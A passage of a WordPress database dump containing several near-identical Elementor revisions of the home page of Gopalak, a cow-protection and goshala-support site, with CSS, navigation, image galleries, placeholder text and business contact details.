srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:52:00','2022-10-13 10:22:00','',1373,'https://gopalak.in/?p=1706',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1707,1,'2022-10-13 15:52:00','2022-10-13 10:22:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:52:00','2022-10-13 10:22:00','',1373,'https://gopalak.in/?p=1707',0,'revision','',0),(1708,1,'2022-10-13 15:52:00','2022-10-13 10:22:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:52:00','2022-10-13 10:22:00','',1373,'https://gopalak.in/?p=1708',0,'revision','',0),(1710,1,'2022-10-13 15:53:32','2022-10-13 10:23:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading 